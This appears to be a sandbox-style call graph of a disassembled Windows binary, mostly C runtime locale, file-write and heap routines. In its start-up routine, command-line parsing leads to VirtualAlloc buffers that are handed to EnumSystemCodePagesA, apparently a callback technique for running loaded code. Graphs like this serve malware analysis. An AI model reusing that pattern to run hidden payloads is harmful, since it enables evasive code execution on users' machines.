13905->13911 13917 eb782b 13906->13917 13907 eb7851 13914 eb78af __expandlocale LeaveCriticalSection 13907->13914 13919 eb77d0 __NMSG_WRITE 13908->13919 13915 ebea44 ___get_qualified_locale_downlevel 71 API calls 13909->13915 13913 ebe1d4 ___get_qualified_locale 65 API calls 13910->13913 13912 eb76ce 13911->13912 13912->13919 13920 eb9fdb __crtGetLocaleInfoA_stat GetLocaleInfoW 13912->13920 13916 eb7663 13913->13916 13918 eb785e 13914->13918 13915->13916 13916->13905 13922 eb7671 13916->13922 13917->13907 13921 eb2248 _free 58 API calls 13917->13921 13923 eb789f 13918->13923 13927 eb20a9 __lock 58 API calls 13918->13927 13928 eb5727 __NMSG_WRITE 58 API calls 13919->13928 13919->13942 13924 eb76eb 13920->13924 13921->13907 13925 eb7294 __expandlocale 90 API calls 13922->13925 13926 eb2248 _free 58 API calls 13923->13926 13929 eb76fc GetACP 13924->13929 13930 eb7708 13924->13930 13934 eb7689 __NMSG_WRITE 13925->13934 13926->13902 13936 eb786a ___removelocaleref 13927->13936 13928->13942 13929->13930 13932 eb5727 __NMSG_WRITE 58 API calls 13930->13932 13931 eb76b2 13931->13904 13937 eb5727 __NMSG_WRITE 58 API calls 13931->13937 13931->13942 13933 eb7726 13932->13933 13940 eb5727 __NMSG_WRITE 58 API calls 13933->13940 13933->13942 13934->13931 13939 eb5727 __NMSG_WRITE 58 API calls 13934->13939 13935 eb7892 13938 eb78bb __expandlocale LeaveCriticalSection 13935->13938 13936->13935 13941 eb40ee ___freetlocinfo 58 API calls 13936->13941 13937->13904 13938->13923 13939->13931 13943 eb773c 13940->13943 13941->13935 13942->13896 13943->13942 13944 eb5727 __NMSG_WRITE 58 API calls 13943->13944 13944->13931 13946 eb22c8 __malloc_crt 58 API calls 13945->13946 13947 eb7c1e 13946->13947 13948 eb7a4a __wsetlocale_get_all 91 API calls 13947->13948 13975 eb7d01 13947->13975 13952 eb7c52 __wsetlocale_get_all 13948->13952 13949 eb56bb __NMSG_WRITE 58 API calls 13949->13952 13950 eb7d66 13951 eaeb49 __invoke_watson 8 API calls 13950->13951 13953 eb7d72 13951->13953 13952->13949 13952->13950 13954 eb7a4a __wsetlocale_get_all 91 API calls 13952->13954 13956 eb7cca 13952->13956 13955 eb7d9c 13953->13955 13967 eb7dbb 13953->13967 13954->13952 13957 eb7da8 13955->13957 13961 eb7ffc __wsetlocale_set_cat 91 API calls 13955->13961 13959 eb7d1a 13956->13959 13960 eb7cd0 13956->13960 13966 eb1e0d ___strgtold12_l 6 API calls 13957->13966 13958 eb7f2b 13958->13957 13963 eb7c06 __wsetlocale_get_all 91 API calls 13958->13963 13964 eb2248 _free 58 API calls 13959->13964 13965 eb7cea 13960->13965 13972 eb2248 _free 58 API calls 13960->13972 13961->13957 13962 eb7f3f 13968 eb7516 __expandlocale 91 API calls 13962->13968 13963->13957 13969 eb7d20 13964->13969 13973 eb2248 _free 58 API calls 13965->13973 13965->13975 13970 eb7fe6 13966->13970 13967->13958 13967->13962 13980 eb7df7 _wcscspn _wcspbrk __wopenfile __NMSG_WRITE 13967->13980 13977 eb7f5b __wsetlocale_get_all 13968->13977 13971 eb7d3b 13969->13971 13974 eb2248 _free 58 API calls 13969->13974 13970->13835 13971->13975 13976 eb2248 _free 58 API calls 13971->13976 13972->13965 13973->13975 13974->13971 13975->13835 13976->13975 13977->13957 13977->13958 13978 eb7ffc __wsetlocale_set_cat 91 API calls 13977->13978 13978->13977 13979 eb5727 __NMSG_WRITE 58 API calls 13979->13980 13980->13957 13980->13958 13980->13979 13981 eb7fef 13980->13981 13983 eb7fea 13980->13983 13985 eb7ffc __wsetlocale_set_cat 91 API calls 13980->13985 13982 eaeb49 __invoke_watson 8 API calls 13981->13982 13984 eb7ffb 13982->13984 13986 eb5b21 __wsetlocale_nolock 6 API calls 13983->13986 13985->13980 13986->13981 14050 eb5b2d IsProcessorFeaturePresent 13987->14050 13991 eb7226 13990->13991 13992 eb722a _wcsnlen 13990->13992 13991->13874 13993 eb22c8 __malloc_crt 58 API calls 13992->13993 13997 eb723e 13992->13997 13994 eb7250 13993->13994 13995 eb5727 __NMSG_WRITE 58 API calls 13994->13995 13994->13997 13996 eb7269 13995->13996 13996->13997 13998 eaeb49 __invoke_watson 8 API calls 13996->13998 13997->13874 13999 eb7280 13998->13999 14000 eb7501 13999->14000 14001 eb74d7 MultiByteToWideChar 13999->14001 14003 eb1e0d ___strgtold12_l 6 API calls 14000->14003 14001->14000 14002 eb74f4 14001->14002 14006 eb7973 14002->14006 14005 eb7512 14003->14005 14005->13874 14007 eb797e 14006->14007 14030 eb799c 14006->14030 14008 eb2280 __calloc_crt 58 API calls 14007->14008 14007->14030 14009 eb798f 14008->14009 14010 eb7997 14009->14010 14011 eb2280 __calloc_crt 58 API calls 14009->14011 14012 eaf100 ___strgtold12_l 58 API calls 14010->14012 14013 eb79b3 14011->14013 14012->14030 14014 eb79bb 14013->14014 14015 eb79c4 14013->14015 14016 eb2248 _free 58 API calls 14014->14016 14017 eb2280 __calloc_crt 58 API calls 14015->14017 14016->14010 14018 eb79cf 14017->14018 14019 eb79e8 __copytlocinfo_nolock 14018->14019 14020 eb79d8 14018->14020 14023 eb7d73 __wsetlocale_nolock 91 API calls 14019->14023 14021 eb2248 _free 58 API calls 14020->14021 14022 eb79df 14021->14022 14024 eb2248 _free 58 API calls 14022->14024 14025 eb7a01 14023->14025 14024->14010 14026 eb7a15 14025->14026 14027 eb48e9 __setmbcp_nolock 70 API calls 14025->14027 14028 eb2248 _free 58 API calls 14026->14028 14026->14030 14027->14026 14029 eb7a23 ___removelocaleref 14028->14029 14031 eb40ee ___freetlocinfo 58 API calls 14029->14031 14030->14000 14032 eb7a31 14031->14032 14033 eb2248 _free 58 API calls 14032->14033 14033->14030 14036 eb731a _memset 14034->14036 14035 eb7328 14035->13901 14036->14035 14037 eb733f 14036->14037 14040 eb7364 _wcscspn 14036->14040 14038 eb5727 __NMSG_WRITE 58 API calls 14037->14038 14044 eb7350 14038->14044 14039 eaeb49 __invoke_watson 8 API calls 14041 eb742d 14039->14041 14040->14035 14043 eb5727 __NMSG_WRITE 58 API calls 14040->14043 14040->14044 14042 eb0595 ___get_qualified_locale_downlevel 58 API calls 14041->14042 14045 eb7437 14042->14045 14043->14040 14044->14035 14044->14039 14046 eb746c 14045->14046 14047 eaf100 ___strgtold12_l 58 API calls 14045->14047 14046->13901 14048 eb7461 14047->14048 14049 eaeb1e ___strgtold12_l 9 API calls 14048->14049 14049->14046 14051 eb5b41 14050->14051 14052 eb59e9 ___raise_securityfailure 5 API calls 14051->14052 14053 eb5b2b 14052->14053 14053->13848 14054->13856 14055->13693 14056->13696 11804 ea6b5a 11805 eae8fc 11804->11805 11806 eae8fe 11805->11806 11807 eae887 11805->11807 11808 eae8dc 11806->11808 11809 eae900 11806->11809 11810 eae895 11807->11810 11812 eb0a20 __amsg_exit 58 API calls 11807->11812 11860 eb0a4b 11808->11860 11811 eae90c 11809->11811 11815 eb0ade _abort 58 API calls 11809->11815 11828 eb12d6 11810->11828 11863 eb0a3c 11811->11863 11812->11810 11815->11811 11818 eae8a6 11842 eb0a5a 11818->11842 11820 eb0a20 __amsg_exit 58 API calls 11820->11818 11821 eae8ae 11823 eae8b9 __wwincmdln 11821->11823 11824 eb0a20 __amsg_exit 58 API calls 11821->11824 11822 eae8e1 __commit 11848 ea1000 GetCommandLineW CommandLineToArgvW 11823->11848 11824->11823 11829 eb12ef __NMSG_WRITE 11828->11829 11833 eae89b 11828->11833 11830 eb2280 __calloc_crt 58 API calls 11829->11830 11838 eb1318 __NMSG_WRITE 11830->11838 11831 eb136f 11832 eb2248 _free 58 API calls 11831->11832 11832->11833 11833->11818 11833->11820 11834 eb2280 __calloc_crt 58 API calls 11834->11838 11835 eb1394 11836 eb2248 _free 58 API calls 11835->11836 11836->11833 11837 eb55ad ___crtDownlevelLCIDToLocaleName 58 API calls 11837->11838 11838->11831 11838->11833 11838->11834 11838->11835 11838->11837 11839 eb13ab 11838->11839 11840 eaeb49 __invoke_watson 8 API calls 11839->11840 11841 eb13b7 11840->11841 11844 eb0a66 __IsNonwritableInCurrentImage 11842->11844 11866 eb4c14 11844->11866 11845 eb0a84 __initterm_e 11847 eb0aa3 __IsNonwritableInCurrentImage __initterm 11845->11847 11869 eb4bff 11845->11869 11847->11821 11935 eae383 11848->11935 11851 ea1048 _memset 11853 ea1058 VirtualAlloc 11851->11853 11852 ea109d 11852->11808 11857 eb0d2f 11852->11857 11938 eae687 11853->11938 11858 eb0c00 _doexit 58 API calls 11857->11858 11859 eb0d3e 11858->11859 11859->11808 11861 eb0c00 _doexit 58 API calls 11860->11861 11862 eb0a56 11861->11862 11862->11822 11864 eb0c00 _doexit 58 API calls 11863->11864 11865 eb0a47 11864->11865 11865->11822 11867 eb4c17 EncodePointer 11866->11867 11867->11867 11868 eb4c31 11867->11868 11868->11845 11872 eb4b03 11869->11872 11871 eb4c0a 11871->11847 11873 eb4b0f __commit 11872->11873 11880 eb0bee 11873->11880 11879 eb4b36 __commit 11879->11871 11881 eb20a9 __lock 58 API calls 11880->11881 11882 eb0bf5 11881->11882 11883 eb4b47 DecodePointer DecodePointer 11882->11883 11884 eb4b24 11883->11884 11885 eb4b74 11883->11885 11894 eb4b41 11884->11894 11885->11884 11897 eb9bd0 11885->11897 11887 eb4bd7 EncodePointer EncodePointer 11887->11884 11888 eb4bab 11888->11884 11891 eb230f __realloc_crt 61 API calls 11888->11891 11893 eb4bc5 EncodePointer 11888->11893 11889 eb4b86 11889->11887 11889->11888 11904 eb230f 11889->11904 11892 eb4bbf 11891->11892 11892->11884 11892->11893 11893->11887 11931 eb0bf7 11894->11931 11898 eb9bd9 11897->11898 11899 eb9bee HeapSize 11897->11899 11900 eaf100 ___strgtold12_l 58 API calls 11898->11900 11899->11889 11901 eb9bde 11900->11901 11902 eaeb1e ___strgtold12_l 9 API calls 11901->11902 11903 eb9be9 11902->11903 11903->11889 11906 eb2316 11904->11906 11907 eb2353 11906->11907 11909 eb6902 11906->11909 11930 eb1d65 Sleep 11906->11930 11907->11888 11910 eb690b 11909->11910 11911 eb6916 11909->11911 11913 eb6870 _malloc 58 API calls 11910->11913 11912 eb691e 11911->11912 11922 eb692b 11911->11922 11914 eb2248 _free 58 API calls 11912->11914 11915 eb6913 11913->11915 11923 eb6926 _rand_s 11914->11923 11915->11906 11916 eb6963 11918 eb4c7e __calloc_impl DecodePointer 11916->11918 11917 eb6933 HeapReAlloc 11917->11922 11917->11923 11919 eb6969 11918->11919 11920 eaf100 ___strgtold12_l 58 API calls 11919->11920 11920->11923 11921 eb6993 11925 eaf100 ___strgtold12_l 58 API calls 11921->11925 11922->11916 11922->11917 11922->11921 11924 eb4c7e __calloc_impl DecodePointer 11922->11924 11927 eb697b 11922->11927 11923->11906 11924->11922 11926 eb6998 GetLastError 11925->11926 11926->11923 11928 eaf100 ___strgtold12_l 58 API calls 11927->11928 11929 eb6980 GetLastError 11928->11929 11929->11923 11930->11906 11934 eb2233 LeaveCriticalSection 11931->11934 11933 eb0bfe 11933->11879 11934->11933 11941 eae3dd 11935->11941 11937 ea1027 VirtualAlloc 11937->11851 11937->11852 12459 eae6a2 11938->12459 11940 ea107b EnumSystemCodePagesA 11940->11852 11942 eae3e9 __commit 11941->11942 11943 eae3fc 11942->11943 11945 eae42d 11942->11945 11944 eaf100 ___strgtold12_l 58 API calls 11943->11944 11946 eae401 11944->11946 11960 eaed0f 11945->11960 11948 eaeb1e ___strgtold12_l 9 API calls 11946->11948 11955 eae40c __commit @_EH4_CallFilterFunc@8 11948->11955 11949 eae432 11950 eae43b 11949->11950 11951 eae448 11949->11951 11952 eaf100 ___strgtold12_l 58 API calls 11950->11952 11953 eae472 11951->11953 11954 eae452 11951->11954 11952->11955 11975 eaee2e 11953->11975 11956 eaf100 ___strgtold12_l 58 API calls 11954->11956 11955->11937 11956->11955 11961 eaed1b __commit 11960->11961 11962 eb20a9 __lock 58 API calls 11961->11962 11963 eaed29 11962->11963 11964 eaeda4 11963->11964 11971 eb2151 __mtinitlocknum 58 API calls 11963->11971 11973 eaed9d 11963->11973 11996 eaec78 11963->11996 12001 eaece2 11963->12001 11966 eb22c8 __malloc_crt 58 API calls 11964->11966 11968 eaedab 11966->11968 11967 eaee1a __commit 11967->11949 11970 eb19da __getstream InitializeCriticalSectionAndSpinCount 11968->11970 11968->11973 11972 eaedd1 EnterCriticalSection 11970->11972 11971->11963 11972->11973 11993 eaee25 11973->11993 11984 eaee4e __wopenfile 11975->11984 11976 eaee68 11978 eaf100 ___strgtold12_l 58 API calls 11976->11978 11977 eaf023 11977->11976 11982 eaf086 11977->11982 11979 eaee6d 11978->11979 11980 eaeb1e ___strgtold12_l 9 API calls 11979->11980 11981 eae47d 11980->11981 11990 eae49f 11981->11990 12008 eb2d65 11982->12008 11984->11976 11984->11977 12011 eb2e52 11984->12011 11987 eb2e52 __wcsnicmp 60 API calls 11988 eaf03b 11987->11988 11988->11977 11989 eb2e52 __wcsnicmp 60 API calls 11988->11989 11989->11977 12452 eaeca8 11990->12452 11992 eae4a5 11992->11955 12006 eb2233 LeaveCriticalSection 11993->12006 11995 eaee2c 11995->11967 11997 eaec99 EnterCriticalSection 11996->11997 11998 eaec83 11996->11998 11997->11963 11999 eb20a9 __lock 58 API calls 11998->11999 12000 eaec8c 11999->12000 12000->11963 12002 eaed03 LeaveCriticalSection 12001->12002 12003 eaecf0 12001->12003 12002->11963 12007 eb2233 LeaveCriticalSection 12003->12007 12005 eaed00 12005->11963 12006->11995 12007->12005 12019 eb2549 12008->12019 12010 eb2d7e 12010->11981 12012 eb2ef0 12011->12012 12013 eb2e64 12011->12013 12364 eb2f08 12012->12364 12015 eaf100 ___strgtold12_l 58 API calls 12013->12015 12016 eaf01c 12013->12016 12017 eb2e7d 12015->12017 12016->11977 12016->11987 12018 eaeb1e ___strgtold12_l 9 API calls 12017->12018 12018->12016 12021 eb2555 __commit 12019->12021 12020 eb256b 12022 eaf100 ___strgtold12_l 58 API calls 12020->12022 12021->12020 12023 eb25a1 12021->12023 12024 eb2570 12022->12024 12030 eb2612 12023->12030 12026 eaeb1e ___strgtold12_l 9 API calls 12024->12026 12029 eb257a __commit 12026->12029 12027 eb25bd 12106 eb25e6 12027->12106 12029->12010 12031 eb2632 12030->12031 12110 eb6ec3 12031->12110 12033 eb264e 12034 eb2d5a 12033->12034 12037 eb2657 12033->12037 12035 eaeb49 __invoke_watson 8 API calls 12034->12035 12036 eb2d64 12035->12036 12039 eb2549 __wsopen_helper 103 API calls 12036->12039 12038 eb2688 12037->12038 12045 eb26ab 12037->12045 12141 eaf0cc 12038->12141 12041 eb2d7e 12039->12041 12041->12027 12043 eaf100 ___strgtold12_l 58 API calls 12044 eb269a 12043->12044 12047 eaeb1e ___strgtold12_l 9 API calls 12044->12047 12046 eb2769 12045->12046 12054 eb2747 12045->12054 12048 eaf0cc __set_osfhnd 58 API calls 12046->12048 12049 eb26a4 12047->12049 12050 eb276e 12048->12050 12049->12027 12051 eaf100 ___strgtold12_l 58 API calls 12050->12051 12052 eb277b 12051->12052 12053 eaeb1e ___strgtold12_l 9 API calls 12052->12053 12055 eb2785 12053->12055 12117 eb3a06 12054->12117 12055->12027 12057 eb2815 12058 eb281f 12057->12058 12059 eb2842 12057->12059 12061 eaf0cc __set_osfhnd 58 API calls 12058->12061 12135 eb23de 12059->12135 12062 eb2824 12061->12062 12064 eaf100 ___strgtold12_l 58 API calls 12062->12064 12063 eb28e2 GetFileType 12067 eb292f 12063->12067 12068 eb28ed GetLastError 12063->12068 12066 eb282e 12064->12066 12065 eb28b0 GetLastError 12144 eaf0df 12065->12144 12071 eaf100 ___strgtold12_l 58 API calls 12066->12071 12149 eb3db2 12067->12149 12072 eb2914 CloseHandle 12068->12072 12073 eaf0df __dosmaperr 58 API calls 12068->12073 12071->12049 12075 eb28d5 12072->12075 12076 eb2922 12072->12076 12073->12072 12074 eb23de ___createFile 3 API calls 12079 eb28a5 12074->12079 12078 eaf100 ___strgtold12_l 58 API calls 12075->12078 12080 eaf100 ___strgtold12_l 58 API calls 12076->12080 12078->12055 12079->12063 12079->12065 12081 eb2927 12080->12081 12081->12075 12082 eb2b08 12082->12055 12085 eb2cdb CloseHandle 12082->12085 12087 eb23de ___createFile 3 API calls 12085->12087 12088 eb2d02 12087->12088 12090 eb2d0a GetLastError 12088->12090 12091 eb2b92 12088->12091 12089 eaf0cc __set_osfhnd 58 API calls 12102 eb29ce 12089->12102 12092 eaf0df __dosmaperr 58 API calls 12090->12092 12091->12055 12096 eb2d16 12092->12096 12094 eaf84a 70 API calls __read_nolock 12094->12102 12095 eb29d6 12095->12102 12167 eb6e29 12095->12167 12182 eb6aaa 12095->12182 12241 eb3baf 12096->12241 12100 eb2b85 12101 eb6e29 __close_nolock 61 API calls 12100->12101 12103 eb2b8c 12101->12103 12102->12082 12102->12094 12102->12095 12102->12100 12104 eb3f56 60 API calls __lseeki64_nolock 12102->12104 12213 eb5edf 12102->12213 12105 eaf100 ___strgtold12_l 58 API calls 12103->12105 12104->12102 12105->12091 12107 eb25ec 12106->12107 12109 eb2610 12106->12109 12363 eb3e34 LeaveCriticalSection 12107->12363 12109->12029 12111 eb6ecd 12110->12111 12112 eb6ee2 12110->12112 12113 eaf100 ___strgtold12_l 58 API calls 12111->12113 12112->12033 12114 eb6ed2 12113->12114 12115 eaeb1e ___strgtold12_l 9 API calls 12114->12115 12116 eb6edd 12115->12116 12116->12033 12118 eb3a12 __commit 12117->12118 12119 eb2151 __mtinitlocknum 58 API calls 12118->12119 12120 eb3a23 12119->12120 12121 eb20a9 __lock 58 API calls 12120->12121 12122 eb3a28 __commit 12120->12122 12130 eb3a36 12121->12130 12122->12057 12124 eb3b16 12125 eb2280 __calloc_crt 58 API calls 12124->12125 12128 eb3b1f 12125->12128 12126 eb3ab6 EnterCriticalSection 12129 eb3ac6 LeaveCriticalSection 12126->12129 12126->12130 12127 eb20a9 __lock 58 API calls 12127->12130 12134 eb3b84 12128->12134 12253 eb3978 12128->12253 12129->12130 12130->12124 12130->12126 12130->12127 12132 eb19da __getstream InitializeCriticalSectionAndSpinCount 12130->12132 12130->12134 12250 eb3ade 12130->12250 12132->12130 12262 eb3ba6 12134->12262 12136 eb23e9 ___crtIsPackagedApp 12135->12136 12137 eb23ed GetModuleHandleW GetProcAddress 12136->12137 12138 eb2444 CreateFileW 12136->12138 12139 eb240a 12137->12139 12140 eb2462 12138->12140 12139->12140 12140->12063 12140->12065 12140->12074 12142 eb05ad __getptd_noexit 58 API calls 12141->12142 12143 eaf0d1 12142->12143 12143->12043 12145 eaf0cc __set_osfhnd 58 API calls 12144->12145 12146 eaf0e8 _rand_s 12145->12146 12147 eaf100 ___strgtold12_l 58 API calls 12146->12147 12148 eaf0fb 12147->12148 12148->12075 12150 eb3e1a 12149->12150 12151 eb3dbe 12149->12151 12152 eaf100 ___strgtold12_l 58 API calls 12150->12152 12151->12150 12156 eb3de0 12151->12156 12153 eb3e1f 12152->12153 12154 eaf0cc __set_osfhnd 58 API calls 12153->12154 12155 eb294d 12154->12155 12155->12082 12155->12102 12158 eb3f56 12155->12158 12156->12155 12157 eb3e05 SetStdHandle 12156->12157 12157->12155 12270 eb3c35 12158->12270 12160 eb3f66 12161 eb3f7f SetFilePointerEx 12160->12161 12162 eb3f6e 12160->12162 12164 eb3f97 GetLastError 12161->12164 12165 eb29b7 12161->12165 12163 eaf100 ___strgtold12_l 58 API calls 12162->12163 12163->12165 12166 eaf0df __dosmaperr 58 API calls 12164->12166 12165->12089 12165->12102 12166->12165 12168 eb3c35 __commit 58 API calls 12167->12168 12171 eb6e37 12168->12171 12169 eb6e8d 12170 eb3baf __free_osfhnd 59 API calls 12169->12170 12173 eb6e95 12170->12173 12171->12169 12174 eb3c35 __commit 58 API calls 12171->12174 12181 eb6e6b 12171->12181 12172 eb3c35 __commit 58 API calls 12175 eb6e77 CloseHandle 12172->12175 12178 eaf0df __dosmaperr 58 API calls 12173->12178 12179 eb6eb7 12173->12179 12176 eb6e62 12174->12176 12175->12169 12177 eb6e83 GetLastError 12175->12177 12180 eb3c35 __commit 58 API calls 12176->12180 12177->12169 12178->12179 12179->12095 12180->12181 12181->12169 12181->12172 12183 eb3f56 __lseeki64_nolock 60 API calls 12182->12183 12184 eb6ac7 12183->12184 12185 eb6b2c 12184->12185 12187 eb3f56 __lseeki64_nolock 60 API calls 12184->12187 12186 eaf100 ___strgtold12_l 58 API calls 12185->12186 12188 eb6b37 12185->12188 12186->12188 12191 eb6ae3 12187->12191 12188->12095 12189 eb6bcb 12195 eb3f56 __lseeki64_nolock 60 API calls 12189->12195 12211 eb6c31 12189->12211 12190 eb6b0c GetProcessHeap HeapAlloc 12193 eb6b27 12190->12193 12198 eb6b40 __setmode_nolock 12190->12198 12191->12185 12191->12189 12191->12190 12192 eb3f56 __lseeki64_nolock 60 API calls 12192->12185 12194 eaf100 ___strgtold12_l 58 API calls 12193->12194 12194->12185 12196 eb6be3 12195->12196 12196->12185 12197 eb3c35 __commit 58 API calls 12196->12197 12199 eb6bf7 SetEndOfFile 12197->12199 12203 eb6b91 12198->12203 12210 eb6ba0 __setmode_nolock 12198->12210 12283 eb5fce 12198->12283 12201 eb6c17 12199->12201 12199->12211 12202 eaf100 ___strgtold12_l 58 API calls 12201->12202 12204 eb6c1c 12202->12204 12205 eaf0cc __set_osfhnd 58 API calls 12203->12205 12206 eaf0cc __set_osfhnd 58 API calls 12204->12206 12209 eb6b96 12205->12209 12207 eb6c27 GetLastError 12206->12207 12207->12211 12208 eb6bb5 GetProcessHeap HeapFree 12208->12211 12209->12210 12212 eaf100 ___strgtold12_l 58 API calls 12209->12212 12210->12208 12211->12185 12211->12192 12212->12210 12214 eb5eeb __commit 12213->12214 12215 eb5ef8 12214->12215 12216 eb5f0f 12214->12216 12217 eaf0cc __set_osfhnd 58 API calls 12215->12217 12218 eb5fae 12216->12218 12219 eb5f23 12216->12219 12221 eb5efd 12217->12221 12220 eaf0cc __set_osfhnd 58 API calls 12218->12220 12222 eb5f4b 12219->12222 12223 eb5f41 12219->12223 12224 eb5f46 12220->12224 12225 eaf100 ___strgtold12_l 58 API calls 12221->12225 12227 eb3978 ___lock_fhandle 59 API calls 12222->12227 12226 eaf0cc __set_osfhnd 58 API calls 12223->12226 12229 eaf100 ___strgtold12_l 58 API calls 12224->12229 12236 eb5f04 __commit 12225->12236 12226->12224 12228 eb5f51 12227->12228 12230 eb5f77 12228->12230 12231 eb5f64 12228->12231 12232 eb5fba 12229->12232 12235 eaf100 ___strgtold12_l 58 API calls 12230->12235 12233 eb5fce __write_nolock 76 API calls 12231->12233 12234 eaeb1e ___strgtold12_l 9 API calls 12232->12234 12237 eb5f70 12233->12237 12234->12236 12238 eb5f7c 12235->12238 12236->12102 12359 eb5fa6 12237->12359 12239 eaf0cc __set_osfhnd 58 API calls 12238->12239 12239->12237 12242 eb3c1b 12241->12242 12245 eb3bbb 12241->12245 12243 eaf100 ___strgtold12_l 58 API calls 12242->12243 12244 eb3c20 12243->12244 12246 eaf0cc __set_osfhnd 58 API calls 12244->12246 12245->12242 12248 eb3be4 12245->12248 12247 eb3c0c 12246->12247 12247->12091 12248->12247 12249 eb3c06 SetStdHandle 12248->12249 12249->12247 12265 eb2233 LeaveCriticalSection 12250->12265 12252 eb3ae5 12252->12130 12254 eb3984 __commit 12253->12254 12255 eb39d3 EnterCriticalSection 12254->12255 12256 eb20a9 __lock 58 API calls 12254->12256 12257 eb39f9 __commit 12255->12257 12258 eb39a9 12256->12258 12257->12134 12259 eb39c1 12258->12259 12260 eb19da __getstream InitializeCriticalSectionAndSpinCount 12258->12260 12266 eb39fd 12259->12266 12260->12259 12269 eb2233 LeaveCriticalSection 12262->12269 12264 eb3bad 12264->12122 12265->12252 12267 eb2233 _doexit LeaveCriticalSection 12266->12267 12268 eb3a04 12267->12268 12268->12255 12269->12264 12271 eb3c40 12270->12271 12272 eb3c55 12270->12272 12273 eaf0cc __set_osfhnd 58 API calls 12271->12273 12274 eaf0cc __set_osfhnd 58 API calls 12272->12274 12278 eb3c7a 12272->12278 12275 eb3c45 12273->12275 12276 eb3c84 12274->12276 12277 eaf100 ___strgtold12_l 58 API calls 12275->12277 12279 eaf100 ___strgtold12_l 58 API calls 12276->12279 12280 eb3c4d 12277->12280 12278->12160 12281 eb3c8c 12279->12281 12280->12160 12282 eaeb1e ___strgtold12_l 9 API calls 12281->12282 12282->12280 12284 eb5fdb __write_nolock 12283->12284 12285 eb601a 12284->12285 12286 eb6039 12284->12286 12317 eb600f 12284->12317 12288 eaf0cc __set_osfhnd 58 API calls 12285->12288 12291 eb6091 12286->12291 12292 eb6075 12286->12292 12287 eb1e0d ___strgtold12_l 6 API calls 12289 eb682f 12287->12289 12290 eb601f 12288->12290 12289->12198 12293 eaf100 ___strgtold12_l 58 API calls 12290->12293 12294 eb60aa 12291->12294 12297 eb3f56 __lseeki64_nolock 60 API calls 12291->12297 12295 eaf0cc __set_osfhnd 58 API calls 12292->12295 12296 eb6026 12293->12296 12342 eb3924 12294->12342 12299 eb607a 12295->12299 12300 eaeb1e ___strgtold12_l 9 API calls 12296->12300 12297->12294 12302 eaf100 ___strgtold12_l 58 API calls 12299->12302 12300->12317 12301 eb60b8 12304 eb6411 12301->12304 12351 eb0595 12301->12351 12303 eb6081 12302->12303 12305 eaeb1e ___strgtold12_l 9 API calls 12303->12305 12306 eb642f 12304->12306 12307 eb67a4 WriteFile 12304->12307 12305->12317 12309 eb6553 12306->12309 12315 eb6445 12306->12315 12310 eb6404 GetLastError 12307->12310 12319 eb63d1 12307->12319 12320 eb655e 12309->12320 12335 eb6648 12309->12335 12310->12319 12311 eb67dd 12311->12317 12318 eaf100 ___strgtold12_l 58 API calls 12311->12318 12313 eb6123 12313->12304 12314 eb6133 GetConsoleCP 12313->12314 12314->12311 12340 eb6162 12314->12340 12315->12311 12316 eb64b4 WriteFile 12315->12316 12315->12319 12316->12310 12316->12315 12317->12287 12321 eb680b 12318->12321 12319->12311 12319->12317 12322 eb6531 12319->12322 12320->12311 12320->12319 12324 eb65c3 WriteFile 12320->12324 12325 eaf0cc __set_osfhnd 58 API calls 12321->12325 12326 eb653c 12322->12326 12327 eb67d4 12322->12327 12323 eb66bd WideCharToMultiByte 12323->12310 12323->12335 12324->12310 12324->12320 12325->12317 12329 eaf100 ___strgtold12_l 58 API calls 12326->12329 12328 eaf0df __dosmaperr 58 API calls 12327->12328 12328->12317 12331 eb6541 12329->12331 12330 eb670c WriteFile 12334 eb675f GetLastError 12330->12334 12330->12335 12332 eaf0cc __set_osfhnd 58 API calls 12331->12332 12332->12317 12334->12335 12335->12311 12335->12319 12335->12323 12335->12330 12336 eba52b 60 API calls __write_nolock 12336->12340 12337 eba58f WriteConsoleW CreateFileW __putwch_nolock 12337->12340 12338 eb624b WideCharToMultiByte 12338->12319 12339 eb6286 WriteFile 12338->12339 12339->12310 12339->12340 12340->12310 12340->12319 12340->12336 12340->12337 12340->12338 12341 eb62e0 WriteFile 12340->12341 12356 eba32e 12340->12356 12341->12310 12341->12340 12343 eb392f 12342->12343 12344 eb393c 12342->12344 12345 eaf100 ___strgtold12_l 58 API calls 12343->12345 12346 eaf100 ___strgtold12_l 58 API calls 12344->12346 12348 eb3948 12344->12348 12347 eb3934 12345->12347 12349 eb3969 12346->12349 12347->12301 12348->12301 12350 eaeb1e ___strgtold12_l 9 API calls 12349->12350 12350->12347 12352 eb05ad __getptd_noexit 58 API calls 12351->12352 12353 eb059b 12352->12353 12354 eb05a8 GetConsoleMode 12353->12354 12355 eb0a20 __amsg_exit 58 API calls 12353->12355 12354->12304 12354->12313 12355->12354 12357 eba1c7 __isleadbyte_l 58 API calls 12356->12357 12358 eba33b 12357->12358 12358->12340 12362 eb3e34 LeaveCriticalSection 12359->12362 12361 eb5fac 12361->12236 12362->12361 12363->12109 12365 eb2f1c 12364->12365 12373 eb2f33 12364->12373 12366 eb2f23 12365->12366 12368 eb2f44 12365->12368 12367 eaf100 ___strgtold12_l 58 API calls 12366->12367 12370 eb2f28 12367->12370 12375 eb2db9 12368->12375 12371 eaeb1e ___strgtold12_l 9 API calls 12370->12371 12371->12373 12372 eb70fa 60 API calls __towlower_l 12374 eb2f4f 12372->12374 12373->12016 12374->12372 12374->12373 12376 eb2dca 12375->12376 12382 eb2e17 12375->12382 12377 eb0595 ___get_qualified_locale_downlevel 58 API calls 12376->12377 12378 eb2dd0 12377->12378 12379 eb2df7 12378->12379 12383 eb42e8 12378->12383 12379->12382 12398 eb466a 12379->12398 12382->12374 12384 eb42f4 __commit 12383->12384 12385 eb0595 ___get_qualified_locale_downlevel 58 API calls 12384->12385 12386 eb42fd 12385->12386 12387 eb432c 12386->12387 12389 eb4310 12386->12389 12388 eb20a9 __lock 58 API calls 12387->12388 12391 eb4333 12388->12391 12390 eb0595 ___get_qualified_locale_downlevel 58 API calls 12389->12390 12392 eb4315 12390->12392 12410 eb4368 12391->12410 12395 eb4323 __commit 12392->12395 12397 eb0a20 __amsg_exit 58 API calls 12392->12397 12395->12379 12397->12395 12399 eb4676 __commit 12398->12399 12400 eb0595 ___get_qualified_locale_downlevel 58 API calls 12399->12400 12401 eb4680 12400->12401 12402 eb20a9 __lock 58 API calls 12401->12402 12408 eb4692 12401->12408 12407 eb46b0 12402->12407 12403 eb0a20 __amsg_exit 58 API calls 12405 eb46a0 __commit 12403->12405 12405->12382 12406 eb46dd 12448 eb4707 12406->12448 12407->12406 12409 eb2248 _free 58 API calls 12407->12409 12408->12403 12408->12405 12409->12406 12411 eb4347 12410->12411 12412 eb4373 __updatetlocinfoEx_nolock 